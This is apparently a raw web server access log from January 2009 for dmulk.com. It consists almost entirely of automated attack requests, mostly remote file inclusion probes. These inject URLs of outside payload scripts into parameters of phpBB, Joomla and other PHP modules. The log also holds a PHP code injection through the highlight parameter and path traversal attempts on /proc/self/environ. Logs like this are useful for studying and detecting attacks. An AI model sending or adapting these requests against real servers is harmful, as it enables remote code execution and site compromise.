216.97.226.250 - - [30/Jan/2009:08:36:45 -0800] "GET /logs/access_081127.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:36:55 -0800] "GET /home.php?pagina=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:37:01 -0800] "GET /logs/access_080422.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:37:01 -0800] "GET /logs/access_080806.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:37:05 -0800] "GET /logs/access_080731.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:37:14 -0800] "GET /logs/access_080826.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:37:18 -0800] "GET /logs/access_080702.log//?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:37:19 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:37:19 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 84609 "-" "libwww-perl/5.823" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:37:37 -0800] "GET /logs/access_080928.log//errors.php?error=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:37:37 -0800] "GET /errors.php?error=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:37:37 -0800] "GET /logs//errors.php?error=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:37:38 -0800] "GET /logs/access_081021.log//?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:37:39 -0800] "GET /logs/access_080717.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:38:14 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:08:38:16 -0800] "GET /logs/access_081220.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:38:20 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:08:38:21 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:08:38:21 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:39:15 -0800] "GET /logs/access_080110.log//modules/TotalCalendar/about.php?inc_dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:39:15 -0800] "GET /logs/access_080408.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:39:19 -0800] "GET /logs/access_080529.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:39:24 -0800] "GET /logs/access_080808.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.3.250 - - [30/Jan/2009:08:39:33 -0800] "GET /index.php?menu=http://www.buenosairesidiomas.com/centro/xuxuon.txt??? HTTP/1.1" 200 94829 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.3.250 - - [30/Jan/2009:08:39:33 -0800] "GET /index.php?menu=http://www.buenosairesidiomas.com/centro/xuxuon.txt??? HTTP/1.1" 200 94829 "-" "libwww-perl/5.810" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:39:40 -0800] "GET /logs/access_080529.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:39:48 -0800] "GET /logs/access_080808.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:39:49 -0800] "GET /logs/access_080424.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:39:52 -0800] "GET /logs/access_080520.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:40:32 -0800] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:08:40:43 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:41:04 -0800] "GET /logs/access_080826.log//errors.php?error=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [30/Jan/2009:08:41:08 -0800] "GET /logs/access_081220.log//include.php?path[docroot]=http://kocmo.org.ua//templates/Ilegalid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:23 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:23 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:23 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:32 -0800] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:45 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:45 -0800] "GET /convert/mvcw.php?vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:45 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:46 -0800] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:46 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:46 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:46 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:41:46 -0800] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:42:01 -0800] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:42:11 -0800] "GET /logs/access_080521.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:42:15 -0800] "GET /logs/access_080928.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:42:15 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:42:16 -0800] "GET /logs//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:42:58 -0800] "GET /logs/access_081016.log/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:42:58 -0800] "GET /components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:42:59 -0800] "GET /logs/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:44:05 -0800] "GET /logs/access_080531.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:44:16 -0800] "GET /logs//login.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:44:16 -0800] "GET /logs/access_080222.log//login.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:44:16 -0800] "GET /login.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:44:16 -0800] "GET /logs/access_080528.log//login.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:44:40 -0800] "GET /logs/access_080712.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:08:45:05 -0800] "GET /logs/access_071227.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:08:45:06 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:08:45:19 -0800] "GET /logs/access_080318.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.35.39 - - [30/Jan/2009:08:45:28 -0800] "GET /logs/index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.135.35.39 - - [30/Jan/2009:08:45:31 -0800] "GET /index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 65555 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:46:23 -0800] "GET /logs/access_080413.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:46:32 -0800] "GET /logs/access_080820.log%20//modules/TotalCalendar/about.php?inc_dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:47:08 -0800] "GET /logs/access_080528.log%20//login.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:47:35 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:47:36 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:48:12 -0800] "GET /logs/access.log/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:08:49:18 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:08:49:18 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:08:49:22 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:08:49:31 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:49:40 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:49:40 -0800] "GET /logs/config.php?path_to_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:49:40 -0800] "GET /config.php?path_to_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:49:49 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:50:01 -0800] "GET /logs/access_080826.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:08:50:24 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:08:50:24 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:08:50:34 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:08:50:34 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:50:43 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:50:43 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:50:44 -0800] "GET /logs/access_080813.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:50:46 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 200 95072 "-" "libwww-perl/5.805" "www.dmulk.com"
208.80.194.120 - - [30/Jan/2009:08:50:46 -0800] "GET / HTTP/1.0" 200 94196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {FC1989A5-885F-D3EC-D2B1-F6D73294D7C5}; .NET CLR 1.1.4322)" "dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:50:50 -0800] "GET /logs/access_080401.log/index.php?option=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:50:52 -0800] "GET /index.php?option=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 200 94899 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:50:54 -0800] "GET /logs/index.php?option=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:51:04 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:51:04 -0800] "GET /skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:51:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:08:51:14 -0800] "GET /logs/access_080429.log//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.228 - - [30/Jan/2009:08:51:27 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1007.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:51:43 -0800] "GET /logs/access_080719.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:51:43 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:51:55 -0800] "GET /logs/access_080719.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:51:56 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:51:56 -0800] "GET /logs//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:08:51:59 -0800] "GET /logs/access_080719.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:08:52:00 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:08:52:19 -0800] "GET /logs/access_080719.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:08:52:19 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
